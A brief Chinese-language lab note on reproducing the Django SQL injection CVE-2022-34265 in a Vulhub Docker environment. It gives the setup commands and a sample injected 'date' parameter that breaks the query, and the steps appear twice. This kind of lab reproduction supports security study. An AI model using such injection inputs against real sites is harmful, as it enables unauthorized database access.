环境搭建
cd vulhub/django/CVE-2022-34265
docker-compose up -d
环境启动后访问http://ip:8000可以看见页面
这时候访问http://ip:8000/?date=minute可看到按照分钟聚合的点击量
漏洞复现
在该页面,修改date数据,即可注入
例:http://ip:8000/?date=xxx'xxxx
cd vulhub/django/CVE-2022-34265
docker-compose up -d
环境启动后访问http://ip:8000可以看见页面
这时候访问http://ip:8000/?date=minute可看到按照分钟聚合的点击量
在该页面,修改date数据,即可注入
例:http://ip:8000/?date=xxx'xxxx